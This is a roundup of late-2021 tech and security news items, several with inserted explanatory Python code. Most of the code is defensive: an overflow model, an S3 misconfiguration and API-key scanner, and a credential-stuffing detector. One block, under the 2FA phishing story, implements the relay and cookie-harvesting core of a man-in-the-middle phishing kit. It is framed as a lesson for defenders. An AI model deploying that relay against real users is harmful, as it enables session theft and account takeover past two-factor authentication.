Businesses

Are 'Zoom Towns' Making Housing Less Affordable? (pewtrusts.org) 82

The CFO of a vacation-rental management company recently told Oregon Public Broadcasting that 20% of people renting a vacation home did so for the first time during the pandemic.

The nonprofit state policy news site Stateline sees a larger trend: Even before the pandemic, the destination towns of the West had a shortage of affordable housing. Limited supply, the remote nature of some of the communities, zoning restrictions and even short construction seasons all contributed.

But the COVID-19 pandemic accelerated everything, including the rise of so-called Zoom towns. Freed from physical offices, suddenly people could live, work and recreate in the vacation communities of the West, with few needs beyond a high-speed internet connection to do jobs that formerly required their presence in major cities. It also in recent years became much easier for owners of second homes to list vacancies with internet-based property firms that promise a steady cash flow in places with seasonal, tourism-based economies. When those homes enter the short-term vacation rental pool, they're no longer available to the local workforce. Brian Chesky, Airbnb's CEO, said recently that about one-fifth of the company's business by room nights is now stays of 30 days or more. People are booking longer stays that combine work and leisure, an area the company sees as full of potential growth...

There are few statewide efforts to address the effects of short-term rentals; some states, such as Idaho, outright prohibit local governments from enacting bans.... In general, the vacation rental industry also fights efforts to enact short-term moratoriums or bans...

[F]ew popular tourist communities in the West have enough affordable options for the staff necessary to run a vacation destination in peak season. In Montana, people who can't afford the rent in some tourist towns have been camping more regularly on public lands in the vicinity, encroaching on grizzly territory. The housing shortage has led directly to more encounters between bears and people, said Bill Avey, a National Forest supervisor in the region. In Whitefish, a gateway to Montana's Glacier National Park, the lack of affordable workforce housing in 2021 forced nearly all food- or beverage-related businesses to curtail hours or close at least one day a week at the height of the summer tourist season, said Lauren Oscilowski, who owns the Spotted Bear Spirits distillery. Over the past year, about half the people on her 11-person team have been forced to move because their landlords decided to turn their housing into more lucrative short-term rentals.

"There's this national thing where hospitality people aren't returning to hospitality because the wages are too low, or they're sick of dealing with the public or whatever it is," Oscilowski said. "But that's just a piece of it. The bigger piece for us is really housing...."

Bug

'Year 2022' Bug Breaks Email Delivery For Microsoft Exchange On-Premise Servers (bleepingcomputer.com) 146

Kalper (Slashdot reader #57,281) shares news from Bleeping Computer: Microsoft Exchange on-premise servers cannot deliver email starting on January 1st, 2022, due to a "Year 2022" bug in the FIP-FS anti-malware scanning engine.

Starting with Exchange Server 2013, Microsoft enabled the FIP-FS anti-spam and anti-malware scanning engine by default to protect users from malicious email. According to numerous reports from Microsoft Exchange admins worldwide, a bug in the FIP-FS engine is blocking email delivery with on-premise servers starting at midnight on January 1st, 2022.

Security researcher and Exchange admin Joseph Roosen said that this is caused by Microsoft using a signed int32 variable to store the value of a date, which has a maximum value of 2,147,483,647. However, dates in 2022 have a minimum value of 2,201,010,001 or larger, which is greater than the maximum value that can be stored in the signed int32 variable, causing the scanning engine to fail and not release mail for delivery. When this bug is triggered, an 1106 error will appear in the Exchange Server's Event Log stating, "The FIP-FS Scan Process failed initialization. Error: 0x80004005. Error Details: Unspecified Error" or "Error Code: 0x80004005. Error Description: Can't convert "2201010001" to long." Microsoft will need to release an Exchange Server update that uses a larger variable to hold the date to officially fix this bug.
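The arithmetic behind the failure, as an added example (this is not Microsoft's code). The article gives 2,201,010,001 as the smallest 2022 value, which fits a version laid out as a six-digit yyMMdd date followed by a four-digit sequence number; that layout and the function names are this example's assumptions. The conversion is a checked one that raises on overflow, which is what the quoted "Can't convert" error shows the engine doing, so the scan process fails to initialize instead of mis-scanning.

```python
# Added example, not Microsoft's code: models the FIP-FS "Year 2022" overflow.
# Assumption: the signature version is the decimal string yyMMdd followed by a
# four-digit sequence number (2201010001 = 2022-01-01, sequence 1, the value the
# article quotes). Function names are this example's own.
from datetime import date, timedelta

INT32_MAX = 2**31 - 1   # 2,147,483,647, the ceiling the article names
INT64_MAX = 2**63 - 1   # the "larger variable" a fix would move to


def encode_version(day: date, seq: int) -> str:
    """Pack a date and a daily sequence number as 'yyMMddNNNN'."""
    if not 1 <= seq <= 9999:
        raise ValueError("sequence number must fit in four digits")
    return f"{day:%y%m%d}{seq:04d}"


def checked_convert(text: str, limit: int) -> int:
    """Convert a decimal string to a signed integer no wider than `limit`,
    raising OverflowError (as the engine did) instead of silently wrapping."""
    value = int(text)
    if not -limit - 1 <= value <= limit:
        raise OverflowError(
            f"Can't convert \"{text}\" to a {limit.bit_length() + 1}-bit integer")
    return value


def engine_accepts(day_iso: str, seq: int = 1, wide: bool = False) -> bool:
    """True if the version for this day fits the integer type in use:
    int32 as shipped, int64 once the field is widened."""
    limit = INT64_MAX if wide else INT32_MAX
    try:
        checked_convert(encode_version(date.fromisoformat(day_iso), seq), limit)
        return True
    except OverflowError:
        return False


def first_rejected_day(start_iso: str, end_iso: str, wide: bool = False):
    """Walk the calendar and return the ISO date of the first day whose version
    no longer converts, or None if every day in the range fits. Any 2022 date
    encodes to at least 2200000000, so with int32 the answer is 2022-01-01."""
    day, end = date.fromisoformat(start_iso), date.fromisoformat(end_iso)
    while day <= end:
        if not engine_accepts(day.isoformat(), 1, wide):
            return day.isoformat()
        day += timedelta(days=1)
    return None


if __name__ == "__main__":
    print(encode_version(date(2021, 12, 31), 1), "fits int32:", engine_accepts("2021-12-31"))
    print(encode_version(date(2022, 1, 1), 1), "fits int32:", engine_accepts("2022-01-01"))
    print("first rejected day (int32):", first_rejected_day("2021-12-01", "2022-01-31"))
    print("first rejected day (int64):", first_rejected_day("2021-12-01", "2022-01-31", wide=True))
```

The general lesson is the one the check above automates: any scheme that embeds a calendar date in a fixed-width integer has a cliff, and the day it falls off can be computed before the code ships.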

However, for on-premise Exchange Servers currently affected, admins have found that you can disable the FIP-FS scanning engine to allow email to start delivering again... Unfortunately, with this unofficial fix, delivered mail will no longer be scanned by Microsoft's scanning engine, leading to more malicious emails and spam getting through to users.

Security

Sega Left One of Its European Servers Wide Open (engadget.com) 5

What could have been a damaging breach in one of Sega's servers appears to have been closed, according to a report by security firm VPN Overview. Engadget reports: The misconfigured Amazon Web Services S3 bucket contained sensitive information which allowed researchers to arbitrarily upload files to a huge swath of Sega-owned domains, as well as credentials to abuse a 250,000-user email list. The domains impacted included the official landing pages for major franchises, including Sonic the Hedgehog, Bayonetta and Total War, as well as the Sega.com site itself. VPNO was able to run executable scripts on these sites which, as you can imagine, would have been quite bad if this breach had been discovered by malicious actors instead of researchers.

An improperly stored Mailchimp API key gave VPNO access to the aforementioned email list. The emails themselves were available in plaintext alongside associated IP addresses, and hashed passwords that the researchers were able to crack. According to the report, "a malicious user could have distributed ransomware very effectively using SEGA's compromised email and cloud services." So far there's no indication that bad actors made use of this vulnerability before VPNO discovered and helped Sega to fix it.
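Two offline checks for the exposures described above, as an added example (not Sega's or VPN Overview's code): a bucket policy or ACL that lets anyone write, and a third-party API key left inside an object. The policy and ACL documents follow the shapes the S3 API returns for GetBucketPolicy and GetBucketAcl; the bucket name, grantee IDs, the sample object and the Mailchimp key pattern (assumed from Mailchimp's documented key shape) are all constructed for the example.

```python
# Added example, not Sega's or VPN Overview's code. Two offline checks for the
# exposures the report describes: a bucket strangers can write to, and a
# third-party API key left in an object. Policy and ACL documents follow the
# shapes the S3 API returns; every input below is constructed for the example.
import fnmatch
import json
import re

# Actions that let an outsider add, replace or delete objects, or loosen the
# bucket's own permissions.
WRITE_ACTIONS = (
    "s3:DeleteObject",
    "s3:PutBucketAcl",
    "s3:PutBucketPolicy",
    "s3:PutObject",
    "s3:PutObjectAcl",
)
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _principal_is_public(principal) -> bool:
    """'*' or {"AWS": "*"} means every AWS principal, anonymous callers included."""
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS", []))


def public_write_statements(policy_json: str) -> list:
    """(Sid, action) pairs where an unconditional Allow lets anyone write.
    Statements carrying a Condition are skipped: they still deserve review,
    but they are not the blanket grant this check hunts for."""
    findings = []
    for st in _as_list(json.loads(policy_json).get("Statement", [])):
        if st.get("Effect") != "Allow" or st.get("Condition"):
            continue
        if not _principal_is_public(st.get("Principal")):
            continue
        for pattern in _as_list(st.get("Action", [])):
            for action in WRITE_ACTIONS:
                # fnmatch expands "s3:*" and "s3:Put*" the way IAM does
                if fnmatch.fnmatchcase(action, pattern):
                    findings.append((st.get("Sid", "<no Sid>"), action))
    return findings


def public_acl_grants(acl: dict) -> list:
    """(group, permission) for ACL grants to the two world-wide grantee groups."""
    out = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            out.append((PUBLIC_GROUPS[grantee["URI"]], grant.get("Permission")))
    return out


# Assumed from Mailchimp's documented key shape: 32 hex characters, a dash and
# a data-centre tag such as us6.
MAILCHIMP_KEY = re.compile(r"\b[0-9a-f]{32}-us\d{1,2}\b")


def find_mailchimp_keys(text: str) -> list:
    """Flag Mailchimp-style API keys in object contents such as a dumped .env."""
    return MAILCHIMP_KEY.findall(text)


# --- constructed sample inputs --------------------------------------------
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-assets/*"},
        {"Sid": "PublicWrite", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": ["s3:PutObject", "s3:PutObjectAcl"],
         "Resource": "arn:aws:s3:::example-assets/*"},
        {"Sid": "OfficeOnly", "Effect": "Allow", "Principal": "*", "Action": "s3:*",
         "Resource": "arn:aws:s3:::example-assets/*",
         "Condition": {"IpAddress": {"aws:SourceIp": "203.0.113.0/24"}}},
    ],
})
SAMPLE_ACL = {
    "Owner": {"ID": "constructed-owner-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "constructed-owner-id"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"}, "Permission": "READ"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"}, "Permission": "WRITE"},
    ],
}
SAMPLE_OBJECT = "MAILCHIMP_API_KEY=0123456789abcdef0123456789abcdef-us6\nDEBUG=false\n"

if __name__ == "__main__":
    print("public write:", public_write_statements(SAMPLE_POLICY))
    print("public ACL grants:", public_acl_grants(SAMPLE_ACL))
    print("keys in object:", find_mailchimp_keys(SAMPLE_OBJECT))
```

The first two functions are what account-level S3 Block Public Access enforces for you; the third is a reminder that a bucket that only has a read problem can still hand out credentials to other services.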

Security

'Critical' Polygon Bug Put $24 Billion in Tokens at Risk Until Recent Hard Fork (theblockcrypto.com) 16

Ethereum scaling project Polygon was at risk of losing nearly all of its MATIC tokens until it upgraded its network earlier this month. From a report: The problem was a "critical" vulnerability in Polygon's proof-of-stake genesis contract, which could have allowed attackers to steal over 9.2 billion MATIC tokens (currently worth over $24 billion). The total supply of MATIC tokens is 10 billion. The vulnerability was reported on the bug bounty platform Immunefi by a whitehat hacker known as Leon Spacewalker. According to details shared Wednesday, the bug essentially could have allowed attackers to arbitrarily mint all of Polygon's more than 9.2 billion MATIC tokens from its MRC20 contract. After Spacewalker found the bug, Immunefi informed the Polygon team the same day. The team then confirmed the vulnerability and moved to update the Polygon network, initially with an update for its Mumbai testnet. According to Polygon, the testnet update was completed on December 4, and the team was preparing for the mainnet upgrade. Yet before the mainnet upgrade was undertaken, a malicious actor exploited the bug and stole 801,601 MATIC tokens (currently worth over $2 million). Polygon has said it will bear the cost of the theft.
Microsoft

Microsoft Defender Log4j Scanner Triggers False Positive Alerts (bleepingcomputer.com) 18

Microsoft Defender for Endpoint is currently showing "sensor tampering" alerts linked to the company's newly deployed Microsoft 365 Defender scanner for Log4j processes. BleepingComputer reports: The alerts are reportedly mainly shown on Windows Server 2016 systems and warn that "possible sensor tampering in memory was detected by Microsoft Defender for Endpoint", attributing it to an OpenHandleCollector.exe process. Admins have been dealing with this issue since at least December 23, according to customer reports.

While this Defender process' behavior is tagged as malicious, there's nothing to worry about since these are false positives, as revealed by Tomer Teller, Principal Group PM Manager at Microsoft, Enterprise Security Posture. Microsoft is currently looking into this Microsoft 365 Defender issue and working on a fix that the company should soon deliver to affected systems. "This is part of the work we did to detect Log4J instances on disk. The team is analyzing why it triggers the alert (it shouldn't of course)," Teller explained.

China

Attackers in China Using Open-source Log4j Flaw (axios.com) 24

A group of Chinese attackers has been using the massive vulnerability in Log4j, a common piece of open-source code, to target a large academic institution, CrowdStrike says. From a report: Experts say hundreds of millions of systems are vulnerable and that attacks based on the flaw are continuing. CrowdStrike said its software observed an attack that exploited the Log4j flaw in software from VMware. The attack came from a China-based group dubbed Aquatic Panda that has been conducting intelligence gathering and industrial espionage, CrowdStrike said. Some security experts, including Cybersecurity and Infrastructure Security Agency (CISA) head Jen Easterly, have called the flaw among the worst they have ever seen.
IT

CES 2022 Will Introduce HDMI 2.1a, Another Confusing New Spec (theverge.com) 35

An anonymous reader shares a report: The HDMI standards are a mess. HDMI 2.1, in particular, is a uniquely frustrating mess, with haphazard support among TV manufacturers, cable makers, and devices that make setting up, say 120Hz gaming on a PS5 or Xbox Series X a uniquely harrowing experience. Fortunately, the HDMI Forum is swooping in ahead of CES with its latest revision to the HDMI specification stack, HDMI 2.1a, which is here to make everything better and simpler... I'm kidding, of course. It's gonna make things more complicated. It's a new HDMI standard, what on earth did you expect?

Let's start with the good: HDMI 2.1a is an upcoming revision to the HDMI 2.1 stack and adds a major new feature, Source-Based Tone Mapping, or SBTM. SBTM is a new HDR feature that offloads some of the HDR tone mapping to the content source (like your computer or set-top box) alongside the tone mapping that your TV or monitor is doing. SBTM isn't a new HDR standard -- it's not here to replace HDR10 or Dolby Vision. Instead, it's intended to help existing HDR setups work better by letting the content source better optimize the content it passes to the display or by removing the need to have the user manually calibrate their screens for HDR by having the source device configure content for the specific display. Other use cases could be for when there's a mix of content types, like for streamers (who could have an HDR game playing alongside a window of black and white text), displaying each area of content.

Security

Iranian Hackers Behind Cox Media Group Ransomware Attack (therecord.media) 4

The ransomware attack that crippled the IT systems and live streams of Cox radio and TV stations earlier this year was the work of Iranian hackers, The Record has learned. From the report: The attack has been attributed to a threat actor tracked under the codename of DEV-0270, a group linked to several intrusions against US companies this year that have ended in the deployment of ransomware. While the intrusion at the Cox Media Group came to light on June 3, when the attackers deployed their ransomware and encrypted some internal servers, the group had actually breached and been lurking inside the company's internal network for weeks since mid-May. The attack did not impact all Cox Media Group radio and TV stations but managed to cripple the ability of some stations to broadcast live streams on their sites. The Cox Media Group initially tried to play down the attack. Local reporters who shared details about the ransomware incident on Twitter were admonished and told to delete tweets. The company did, however, formally confirm the attack in October, four months later, but without mentioning any details about the Iranian hackers.
Privacy

T-Mobile Suffers Another Data Breach (androidpolice.com) 6

"T-Mobile had another data breach," writes Slashdot reader motang. "This comes after the massive breach that affected millions of users this past summer." According to Android Police, a small number of accounts had their data viewed by an unknown individual -- including names, addresses, phone numbers, plan rates, and number of lines -- or fell victim to an unauthorized SIM swap, with a third subset of users facing both. From the report: For its part, the company has contacted individuals who were targeted in this breach, alerting them to specify what was or wasn't viewed and highlighting that this hacker stole no payment or password data to its knowledge. However, T-Mobile has yet to report any specifics about how many customers were directly affected. [...] It seems possible that this is another example of poor security practices, though we'll have to wait until T-Mobile delivers more information. The T-Mo Report was first to report the data breach.
Security

Cyberattack On One of Norway's Largest Media Companies Shuts Down Presses (therecord.media) 11

An anonymous reader quotes a report from The Record: Amedia, the largest local news publisher in Norway, announced on Tuesday that several of its central computer systems were shut down in what it is calling an apparent "serious" cyberattack. The attack is preventing the company from printing Wednesday's edition of physical newspapers, and presses will continue to be halted until the issue is resolved, Amedia executive vice president of technology Pal Nedregotten said in a statement. The hack also impacts the company's advertising and subscription systems, preventing advertisers from purchasing new ads and stopping subscribers from ordering or canceling subscriptions.

The company said it is unclear whether personal information has been compromised -- the subscription system affected by the attack contains names, addresses, phone numbers, and subscription history of customers. Data such as passwords, read history, and financial information are not affected, the company said. Amedia publishes more than 90 newspapers and other publications that reach more than 2.5 million Norwegians, according to the company's website. The attack on Amedia is the third major Norwegian cyberattack reported over the last several days.
"We are in the process of gaining an overview of the situation, but do not yet know the full potential for damage. We have already implemented comprehensive measures to limit the damage and to restore normal operations as quickly as possible," said Nedregotten in a translated statement on the company's website.
Security

LastPass Says It Didn't Leak Your Password 25

Did LastPass get hacked? Gizmodo: Some users of the popular password manager recently received emails from the company warning them of suspicious login attempts that were utilizing their master password -- definitely never a great sign. Speculation soon spread that LastPass may have suffered a data breach that exposed users' credentials, thus allowing for the malicious activity to take place.

According to LastPass itself, the answer is: We don't think so. When reached for comment by Gizmodo, the company provided us with a statement blaming the irregular activity on "credential stuffing" attempts by some unknown threat actor: "LastPass investigated recent reports of blocked login attempts and we believe the activity is related to attempted 'credential stuffing' activity, in which a malicious or bad actor attempts to access user accounts (in this case, LastPass) using email addresses and passwords obtained from third-party breaches related to other unaffiliated services."
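What separates credential stuffing from a breach of the service itself, as an added example (not LastPass's code or telemetry): stuffing replays leaked email/password pairs from other sites, so a single source touches many different accounts, most of them once and most of them failing, whereas a brute force hammers one account with many passwords, and a leaked master-password database would show successes without that fan-out. The log lines, addresses and thresholds below are constructed for the example.

```python
# Added example, not LastPass's code: the detection logic behind a
# "credential stuffing" call. One source attempting many *different* accounts
# in a short window is the stuffing signature; one account failing repeatedly
# is a brute force. Log lines below are constructed (documentation IP ranges).
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_LOG = """\
2021-12-27T10:00:01Z 203.0.113.7 alice@example.test FAIL
2021-12-27T10:00:02Z 203.0.113.7 bob@example.test FAIL
2021-12-27T10:00:02Z 203.0.113.7 carol@example.test FAIL
2021-12-27T10:00:03Z 203.0.113.7 dave@example.test OK
2021-12-27T10:00:04Z 203.0.113.7 erin@example.test FAIL
2021-12-27T10:00:05Z 203.0.113.7 frank@example.test FAIL
2021-12-27T10:00:06Z 203.0.113.7 grace@example.test FAIL
2021-12-27T10:05:00Z 198.51.100.9 heidi@example.test FAIL
2021-12-27T10:05:10Z 198.51.100.9 heidi@example.test FAIL
2021-12-27T10:05:20Z 198.51.100.9 heidi@example.test FAIL
2021-12-27T10:05:30Z 198.51.100.9 heidi@example.test FAIL
2021-12-27T10:05:40Z 198.51.100.9 heidi@example.test FAIL
2021-12-27T12:00:00Z 192.0.2.44 alice@example.test OK
"""


def parse_log(text: str) -> list:
    """Turn 'timestamp ip account result' lines into (datetime, ip, account, result)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, account, result = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, account.lower(), result))
    return events


def detect_stuffing(events, window: timedelta = timedelta(minutes=10), min_accounts: int = 5) -> dict:
    """Return {ip: sorted accounts touched} for sources that attempted logins to
    at least `min_accounts` distinct accounts within any `window`-long span.
    Successful attempts count too: the leaked pair that still works is the one
    that needs a forced reset and session revocation."""
    by_ip = defaultdict(list)
    for ts, ip, account, _ in sorted(events):
        by_ip[ip].append((ts, account))
    flagged = {}
    for ip, attempts in by_ip.items():
        lo = 0
        for hi in range(len(attempts)):
            while attempts[hi][0] - attempts[lo][0] > window:   # slide the window
                lo += 1
            if len({a for _, a in attempts[lo:hi + 1]}) >= min_accounts:
                flagged[ip] = sorted({a for _, a in attempts})
                break
    return flagged


def classify(events, ip: str) -> str:
    """Coarse label for one source: 'stuffing', 'brute-force' or 'normal'."""
    mine = [(a, r) for _, i, a, r in events if i == ip]
    accounts = {a for a, _ in mine}
    failures = sum(r == "FAIL" for _, r in mine)
    if len(accounts) >= 5 and failures / max(len(mine), 1) > 0.5:
        return "stuffing"
    if len(accounts) == 1 and failures >= 5:
        return "brute-force"
    return "normal"


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for ip, accounts in detect_stuffing(evs).items():
        print(ip, classify(evs, ip), "->", len(accounts), "accounts, e.g.", accounts[:3])
```

In the sample, 203.0.113.7 is the stuffing source and the one success inside its run (dave) is the account to act on; 198.51.100.9 is a single-account brute force and gets a different response (lockout or step-up, not a fleet-wide reset); the blocked-login notices the story describes correspond to the per-attempt FAIL rows.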
Security

Shutterfly Services Disrupted By Conti Ransomware Attack (bleepingcomputer.com) 21

Photography and personalized photo giant Shutterfly has suffered a Conti ransomware attack that allegedly encrypted thousands of devices and stole corporate data. BleepingComputer reports: On Friday, a source told BleepingComputer that Shutterfly suffered a ransomware attack approximately two weeks ago by the Conti gang, who claims to have encrypted over 4,000 devices and 120 VMware ESXi servers. While BleepingComputer has not seen the negotiations for the attack, we are told that they are underway and that the ransomware gang is demanding millions of dollars as a ransom. Conti has created a private Shutterfly data leak page containing screenshots of files allegedly stolen during the ransomware attack, as part of this "double-extortion" tactic. The attackers threaten to make this page public if a ransom is not paid.

BleepingComputer has been told that these screenshots include legal agreements, bank and merchant account info, login credentials for corporate services, spreadsheets, and what appears to be customer information, including the last four digits of credit cards. Conti also claims to have the source code for Shutterfly's store, but it is unclear if the ransomware gang means Shutterfly.com or another website. After contacting Shutterfly on Friday about the attack, BleepingComputer was sent a statement confirming the ransomware attack late Sunday night. This statement [...] says that the Shutterfly.com, Snapfish, TinyPrints, and Spoonflower sites were not affected by the attack. However, their corporate network, Lifetouch, BorrowLenses, and Groovebook had disrupted services. While Shutterfly states that no financial information was disclosed, BleepingComputer was told that one of the screenshots contains the last four digits of credit cards, so it is unclear if there is further, and more concerning, information stolen during the attack.

Microsoft

Microsoft, Salesforce Battle To Revitalize Customer Service (bloomberg.com) 18

Customer support has become a crowded battlefield in enterprise technology as software vendors from Microsoft to Salesforce rush to arm organizations with tools to create one-stop service centers. From a report: The attention is revitalizing the call center, a once-backwater unit that has long suffered from high turnover rates and minimal corporate investment. Salesforce, ServiceNow, Twilio and Genesys Cloud Services are among the companies that see the call center as a critical part of efforts to transform the consumer base from a sea of faceless pocketbooks to potentially millions of unique personas. It's viewed as a way to improve customer service and bolster brand loyalty at a time when businesses are increasingly worried about churn.

Zoom Video Communications was prepared to fork over $14.7 billion in stock to buy Five9 to gain a foothold in the contact center industry. But Five9 shareholders ultimately thought the price was too low and turned down the deal, a testament to just how much the sector is expected to grow in the coming years. "Instead of being a cost center, it's a lifetime value driver," said Vasili Triant, chief operating officer at UJET, a closely held San Francisco-based call center cloud software provider. As a result, "this space has drawn a lot of attention. Companies need to improve experience. Because of that, a lot of money has flown into it. When money flows into it, people see a huge opportunity."

Historically, customer support software was viewed as a money pit -- systems that were necessary to help field consumer complaints or inquiries but produced little return on investment. Many businesses simply wanted to pick a product, deploy it and forget about it. As a result, the market was fragmented between just a handful of top vendors, including Genesys, Cisco Systems and Avaya. But as more companies move those systems to the internet, that mindset is undergoing a seismic shift. For the last several years, the focus has been on helping call center agents provide better customer support and cut down on service times. That has meant taking steps like consolidating different applications onto a single desktop interface, alleviating the need for agents to toggle between different tabs to view customer data stored in various places.

Security

More Than 1,200 Phishing Toolkits Capable of Intercepting 2FA Detected in the Wild (therecord.media) 52

A team of academics said it found more than 1,200 phishing toolkits deployed in the wild that are capable of intercepting and allowing cybercriminals to bypass two-factor authentication (2FA) security codes. From a report: Also known as MitM (Man-in-the-Middle) phishing toolkits, these tools have become extremely popular in the cybercrime underworld in recent years after major tech companies started making 2FA a default security feature for their users. The direct result was that threat actors who managed to trick a user into entering credentials on a phishing site found that the stolen credentials became useless since they couldn't bypass the 2FA procedure. To counter this new trend in account security protections, since at least 2017, threat actors started adopting new tools that would allow them to bypass 2FA by stealing a user's authentication cookies, which are files created inside a web browser once the user has logged into an account after the 2FA process was completed. In most instances, cybercrime groups have relied on a malware category known as an "infostealer" to steal these authentication cookie files from computers they managed to infect. However, there is another way to steal these files that does not rely on infecting a computer with malware -- namely, by stealing the authentication cookies while they transit the internet from the service provider to a user's computer.
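The relay step that makes these kits work, as an added example (not from the paper and not any real toolkit's code). The page describes the cookies being taken in transit; the usual design is a reverse proxy that sits between the victim and the genuine site, forwards the password and 2FA code upstream so the real checks pass, and on the way back copies the session cookie the real service sets while rewriting hostnames so the browser stays on the look-alike domain. The two hostnames and the HTTP messages below are constructed.

```python
# Added example, not from the paper or any real toolkit: the relay step a
# MitM phishing kit performs. The kit is a reverse proxy between victim and
# genuine site; it forwards credentials and the 2FA code upstream and, on the
# way back, copies the session cookie while rewriting hostnames.
# Hostnames and messages are constructed for the example.
import re

REAL_HOST = "login.example-bank.test"          # constructed: the genuine site
PHISH_HOST = "login.example-bank-verify.test"  # constructed: attacker's look-alike


def parse_response(raw: bytes):
    """Split a raw HTTP/1.1 response into (status line, [(name, value), ...], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = [tuple(line.split(": ", 1)) for line in lines[1:]]
    return lines[0], headers, body


def relay_to_victim(raw_upstream: bytes, harvest: dict) -> bytes:
    """Rewrite the genuine site's response for the victim's browser and record
    every Set-Cookie into `harvest` (the attacker's copy of the session)."""
    status, headers, body = parse_response(raw_upstream)
    out = []
    for name, value in headers:
        if name.lower() == "set-cookie":
            key, _, val = value.split(";", 1)[0].partition("=")
            harvest[key.strip()] = val.strip()
            # Drop Domain= so the browser scopes the cookie to PHISH_HOST; the
            # victim's session keeps working, but only through the proxy.
            parts = re.split(r";\s*", value)
            value = "; ".join(p for p in parts if not p.lower().startswith("domain="))
        elif name.lower() in ("location", "content-security-policy"):
            value = value.replace(REAL_HOST, PHISH_HOST)
        out.append((name, value))
    body = body.replace(REAL_HOST.encode(), PHISH_HOST.encode())
    out = [(n, str(len(body))) if n.lower() == "content-length" else (n, v) for n, v in out]
    head = "\r\n".join([status] + [f"{n}: {v}" for n, v in out])
    return head.encode("latin-1") + b"\r\n\r\n" + body


def relay_to_real_site(raw_victim_request: bytes) -> bytes:
    """Forward the victim's request upstream with Host/Origin/Referer pointed at
    the genuine site, so the real password and 2FA checks run unchanged."""
    head, _, body = raw_victim_request.partition(b"\r\n\r\n")
    return head.replace(PHISH_HOST.encode(), REAL_HOST.encode()) + b"\r\n\r\n" + body


def attacker_replay_headers(harvest: dict) -> dict:
    """All the attacker needs afterwards: a Cookie header built from the
    harvested session, which the real site cannot tell apart from the victim's."""
    return {"Host": REAL_HOST, "Cookie": "; ".join(f"{k}={v}" for k, v in harvest.items())}


# Constructed: what the genuine site returns once the relayed password and
# 2FA code have both been accepted.
UPSTREAM_OK = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: https://login.example-bank.test/account\r\n"
    b"Set-Cookie: SESSION=s3ss10n-t0k3n; Domain=.example-bank.test; Path=/; Secure; HttpOnly\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    harvest = {}
    print(relay_to_victim(UPSTREAM_OK, harvest).decode("latin-1"))
    print("harvested:", harvest)
    print("replay:", attacker_replay_headers(harvest))
```

The point for defenders is in the last function: the relayed cookie is indistinguishable server-side from the victim's own, and the login that produced it passed every check the service ran, including the 2FA code, because the victim typed it into the kit in real time.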
Businesses

Is the Video Game Industry Closer to Unionization Than Ever Before? (msn.com) 81

"Video game companies in North America have never successfully unionized," reports the Washington Post. "That changed December 16, when a union at the indie developer Vodeo Games was recognized by management." While video game companies rake in billions of dollars, their workers complain of unfair labor practices, long hours, sexual harassment and workplace misconduct... In the past, game workers would avoid speaking out publicly against their employer, as it could tarnish their reputation within the industry and make it difficult to find future jobs. But after decades of major gaming companies expecting employees to work 80- or 90-hour workweeks, and of workers fearing retaliation from management, Vodeo employees told The Post that the tide was changing...

What's happening in the games industry at Activision Blizzard and Vodeo is unprecedented. No single gaming company like Activision Blizzard has dominated the headlines with lawsuit after lawsuit for months before, topped off with an explosive Wall Street Journal report in November that claimed CEO Bobby Kotick did not inform the company's board of directors for years about sexual misconduct allegations. A petition calling for Kotick's resignation that was circulated among employees netted over 1,850 signatures... At least several dozen Activision Blizzard workers across the company are in the midst of their third work stoppage following a California state agency lawsuit that alleged widespread sexual harassment and misconduct at the company. The strike is on its third week as workers demand that management rehire 12 contractors from Call of Duty developer Raven Software and promote all Raven quality assurance testers to full-time status. Some in-person demonstrations have taken place at the quality assurance office in Austin, Texas.

Activision Blizzard management responded to employees in a Dec. 10 email that ongoing work toward improving company culture would be best achieved without a union...

Activision Blizzard's tumultuous battle with lawsuits, government investigations and worker protests has Wall Street analysts downgrading their rating of its stock. Unionization would further lower the company's market value, according to Wedbush Securities analyst Michael Pachter. "If they were to succeed [in unionizing], the company would have to determine whether to recognize the union or to bust it," Pachter said. "If only the hourly workers chose unionization, Activision could decide whether it is cheaper to recognize them or to export their jobs to a nonunion locale."

That possibility looms large for workers in the industry. "I do fear for my job," said Aubrey Ryan, a contractor working for Blizzard. "Even if I'm fired, I have been part of a movement that is going to change the games industry. I might not benefit, but future people like me will."

Some interesting quotes from two pro-union figures interviewed by the Post:
  • "There's been a lot of groundwork that's been happening in the game industry over the last few years in terms of raising awareness about unions." — Vodeo designer Carolyn Jong
  • "Vodeo has broken the ice on smaller studios. There are definitely folks at smaller studios that are realizing that unions are not just for triple A studios..." — a Southern California games-industry organizer

Government

Employee Background Check Errors Harm Thousands of Workers (consumerfinance.gov) 65

Slashdot reader dcblogs writes: Criminal background checks that incorrectly identify an applicant as a thief or sex offender happen more often than many expect. This story reviewed more than 75 lawsuits against background check firms and spoke with plaintiff attorneys and industry experts to paint a picture of an industry that can ruin lives in minutes. Job applicants are labeled thieves and sex offenders by incorrect reports, and job candidates may protest, but it may not do them any good. Employers may drop them as damaged goods before the correction.
